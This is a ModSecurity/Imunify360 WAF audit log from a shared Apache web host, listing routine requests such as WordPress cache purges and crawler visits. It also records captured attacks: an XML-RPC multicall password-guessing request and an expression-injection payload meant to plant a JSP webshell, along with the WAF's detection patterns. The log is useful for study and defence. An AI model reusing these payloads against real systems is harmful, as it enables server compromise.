Viewing / Editing File: modsec_log_103.185.74.40.txt
Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233402989757 1020192 (- - -) Stopwatch2: 1751233402989757 1020192; combined=3878, p1=91, p2=3342, p3=143, p4=8, p5=233, sr=69, sw=0, l=0, gc=61 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ef52af20-Z-- --05438020-A-- [30/Jun/2025:03:13:24.018759 +0530] aGGzerfh0HubEMB53AwGoAAAAA0 103.185.74.40 22503 192.168.74.40 443 --05438020-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --05438020-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --05438020-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233402775854 1243298 (- - -) Stopwatch2: 1751233402775854 1243298; combined=2503, p1=85, p2=2136, p3=0, p4=0, p5=282, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --05438020-Z-- --44c5e659-A-- [30/Jun/2025:03:13:24.747134 +0530] aGGze1TzcR44go1TAbnI8wAAAAs 2.58.56.24 52926 192.168.74.40 443 --44c5e659-B-- POST //xmlrpc.php HTTP/1.1 Host: rukunaltazaj.com Keep-Alive: 300 Connection: keep-alive Cookie: pll_language=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Content-Type: application/xml Content-Length: 483 --44c5e659-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>rukun</string></value><value><string>1234</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --44c5e659-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233404776911 21737 (- - -) Stopwatch2: 1751233404776911 21737; combined=6084, p1=192, p2=5569, p3=106, p4=17, p5=200, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f6c20c3f-Z-- --3539536f-A-- [30/Jun/2025:03:13:25.374205 +0530] aGGzfAFYEHPiTVtVrc8-0wAAABU 103.185.74.40 53930 192.168.74.40 443 --3539536f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --3539536f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3539536f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751233404230627 1144000 (- - -) Stopwatch2: 1751233404230627 1144000; combined=2957, p1=122, p2=2660, p3=0, p4=0, p5=175, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --3539536f-Z-- --d6854966-A-- [30/Jun/2025:03:13:25.935220 +0530] aGGzfU9ckYDu-wxh82kCBgAAACI 20.171.207.114 51150 192.168.74.40 443 --d6854966-B-- GET /returns_refunds.php/images/images/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/js/images/js/cart_empty.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=9qeirg2ig7h0cs6m8ngqo5ku05 host: ozautomotives.com.au --d6854966-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ae62f07e-Z-- --e2fcab1c-A-- [30/Jun/2025:03:49:50.564140 +0530] aGG8BmPuHNyj2WEVAJ_7CwAAACk 54.238.164.208 60394 192.168.74.40 443 --e2fcab1c-B-- POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Connection: close Content-Length: 256 Content-type: application/x-www-form-urlencoded Accept-Encoding: gzip --e2fcab1c-C-- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/ghPKZYvPC3mV.jsp"]} --e2fcab1c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e2fcab1c-H-- Message: Pattern match 
"(?i)\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS_NAMES:{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/ghPKZYvPC3mV.jsp"]}. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "53"] [id "77134464"] [msg "IM360 WAF: Infectors: PHP Injection High-Risk PHP Function||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/uapjs||"] [severity "DEBUG"] [tag "service_im360"] Message: Pattern match "(?:print|echo|eval|exec)\\(" at ARGS_NAMES:{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/ghPKZYvPC3mV.jsp"]}. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "91"] [id "77140881"] [msg "IM360 WAF: Infectors: Arbitrary code execution vulnerability in Request URI||RSV:7.05||RS:0||T:APACHE||SC:/home/adminsu/public_html/uapjs||"] [severity "DEBUG"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751235590004098 560497 (- - -) Stopwatch2: 1751235590004098 560497; combined=12823, p1=160, p2=12392, p3=0, p4=0, p5=271, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e2fcab1c-Z-- --9ad6551b-A-- [30/Jun/2025:03:49:52.541519 +0530] aGG8Bw62vJhyO1HBb4bj0AAAACY 43.159.132.207 46602 192.168.74.40 80 --9ad6551b-B-- GET /ugcourse-college-admission-palani.php HTTP/1.1 Host: www.scas.org.in User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --9ad6551b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237020792648 16378 (- - -) Stopwatch2: 1751237020792648 16378; combined=2911, p1=124, p2=2615, p3=0, p4=0, p5=172, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --40f54771-Z-- --135a6446-A-- [30/Jun/2025:04:13:41.904286 +0530] aGHBnIhTMaRSLrHujwHt8gAAAAw 103.185.74.40 58333 192.168.74.40 443 --135a6446-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --135a6446-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --135a6446-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237020656517 1248020 (- - -) Stopwatch2: 1751237020656517 1248020; combined=3183, p1=114, p2=2922, p3=0, p4=0, p5=146, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --135a6446-Z-- --c7fbcd01-A-- [30/Jun/2025:04:13:42.077926 +0530] aGHBnvb_H9JJq-59BHnsLQAAAEM 20.171.207.232 36572 192.168.74.40 443 --c7fbcd01-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-agra/js/images/Rajasthan-Travel-Guides/Bundi-City-Guide.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c7fbcd01-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c7fbcd01-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237023257490 17289 (- - -) Stopwatch2: 1751237023257490 17289; combined=3784, p1=167, p2=3488, p3=0, p4=0, p5=129, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e1294e7f-Z-- --0adecb26-A-- [30/Jun/2025:04:13:43.332632 +0530] aGHBnk6GU2Qn68mjaVRKlgAAAAM 103.185.74.40 40782 192.168.74.40 443 --0adecb26-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --0adecb26-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0adecb26-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751237022115754 1217226 (- - -) Stopwatch2: 1751237022115754 1217226; combined=2662, p1=104, p2=2342, p3=0, p4=0, p5=216, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0adecb26-Z-- --50aa6f6c-A-- [30/Jun/2025:04:13:43.792682 +0530] aGHBn4hTMaRSLrHujwHt8wAAAAw 14.241.242.64 37945 192.168.74.40 443 --50aa6f6c-B-- POST /contact-us.php HTTP/1.1 Host: SARAVANABUILDERS.COM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Transfer-Encoding: chunked Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Connection: close Content-Type: application/json Cookie: PHPSESSID=2138ab4ee0fd432d9432dfe480be59f5 Upgrade-Insecure-Requests: 1 --50aa6f6c-C-- {"email":"jonesregina1970@yahoo.com","name":"XaiZMRoGko","phone":"9241857645"} -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751239473988657 20881 (- - -) Stopwatch2: 1751239473988657 20881; combined=4953, p1=137, p2=4520, p3=140, p4=13, p5=142, sr=57, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --34136b59-Z-- --f2dd544e-A-- [30/Jun/2025:04:54:35.078038 +0530] aGHLM4xNbWjYKqpX5RfJ_AAAADE 103.185.74.40 20150 192.168.74.40 443 --f2dd544e-B-- POST /wp-cron.php?doing_wp_cron=1751239474.6794710159301757812500 HTTP/1.1 Host: adillusion.com User-Agent: WordPress/6.4.5; https://adillusion.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --f2dd544e-C-- --f2dd544e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.2.5 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --f2dd544e-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=7490, p1=123, p2=7155, p3=208, p4=4, p5=0, sr=46, sw=0, l=0, gc=0||Py scan:10679||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751239475059313 19070 (- - -) Stopwatch2: 1751239475059313 19070; combined=7739, p1=123, p2=7155, p3=208, p4=4, p5=249, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --f2dd544e-Z-- --f72e511b-A-- [30/Jun/2025:04:54:35.113475 +0530] aGHLM4de_FFHVOwW1Rxn4AAAACA 20.171.207.232 44040 192.168.74.40 443 --f72e511b-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/testimonials/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f72e511b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f72e511b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751240618044421 14244 (- - -) Stopwatch2: 1751240618044421 14244; combined=2892, p1=155, p2=2536, p3=0, p4=0, p5=200, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8739e81d-Z-- --5376435d-A-- [30/Jun/2025:05:13:38.660478 +0530] aGHPqWqNdIPZFRu13YsAxwAAAB8 103.185.74.40 47972 192.168.74.40 443 --5376435d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --5376435d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5376435d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751240617551485 1109347 (- - -) Stopwatch2: 1751240617551485 1109347; combined=2235, p1=80, p2=1997, p3=0, p4=0, p5=157, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5376435d-Z-- --fc1b305b-A-- [30/Jun/2025:05:13:38.710351 +0530] aGHPqgPfZ2nlMBWDsmIY3gAAADA 20.171.207.114 47784 192.168.74.40 443 --fc1b305b-B-- GET /returns_refunds.php/admin@oz/sweetalert-master/dist/images/js/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/js/js/cart.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=nfolgh20ar1bdhc7rs9vb35lu3 host: ozautomotives.com.au --fc1b305b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751240619401567 463924 (- - -) Stopwatch2: 1751240619401567 463924; combined=7459, p1=248, p2=6803, p3=156, p4=3, p5=248, sr=180, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --39960732-Z-- --d3af3d6d-A-- [30/Jun/2025:05:13:40.265153 +0530] aGHPqg_iStjAv6ue9uEmZgAAAAw 103.185.74.40 12539 192.168.74.40 443 --d3af3d6d-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --d3af3d6d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d3af3d6d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751240618940597 1324878 (- - -) Stopwatch2: 1751240618940597 1324878; combined=2673, p1=83, p2=2434, p3=0, p4=0, p5=155, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d3af3d6d-Z-- --df555974-A-- [30/Jun/2025:05:13:40.816757 +0530] aGHPq6lpraUFhCVMJwbStgAAAAY 170.106.72.93 33636 192.168.74.40 80 --df555974-B-- GET / HTTP/1.1 Host: www.bechdoanaj.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --df555974-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.0.28 Cache-Control: no-cache, private -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --73dede5a-Z-- --e9784438-A-- [30/Jun/2025:05:29:30.292596 +0530] aGHTYSXyVzaAtUvsLrwbmwAAABY 162.216.150.9 63996 192.168.74.40 443 --e9784438-B-- GET / HTTP/1.1 Host: 103.185.74.40:443 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept-Encoding: gzip --e9784438-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e9784438-H-- Message: Access denied with code 403 (phase 1). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "121"] [id "77350470"] [msg "IM360 WAF: Vulnerability scanner detected||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 1) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241569745345 548256 (- - -) Stopwatch2: 1751241569745345 548256; combined=223, p1=92, p2=0, p3=0, p4=0, p5=131, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e9784438-Z-- --5ef8e22f-A-- [30/Jun/2025:05:29:30.313434 +0530] aGHTYq7C7NxMgetm3tnZJwAAAC4 20.171.207.232 44180 192.168.74.40 443 --5ef8e22f-B-- GET /https/aainag/images/testimonials/rajasthan-tours-from-delhi/js/js/js/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5ef8e22f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --5ef8e22f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/images/testimonials/rajasthan-tours-from-delhi/js/js/js/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/images/testimonials/rajasthan-tours-from-delhi/js/js/js/tnc.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241570298519 15225 (- - -) Stopwatch2: 1751241570298519 15225; combined=2976, p1=155, p2=2684, p3=0, p4=0, p5=137, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751241916803162 15512 (- - -) Stopwatch2: 1751241916803162 15512; combined=3636, p1=157, p2=3342, p3=0, p4=0, p5=137, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --4ce24c0d-Z-- --4415ca34-A-- [30/Jun/2025:05:35:16.828119 +0530] aGHUuyrZfMONs8aFSvwZKQAAAB4 103.185.74.40 26763 192.168.74.40 443 --4415ca34-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --4415ca34-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4415ca34-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp 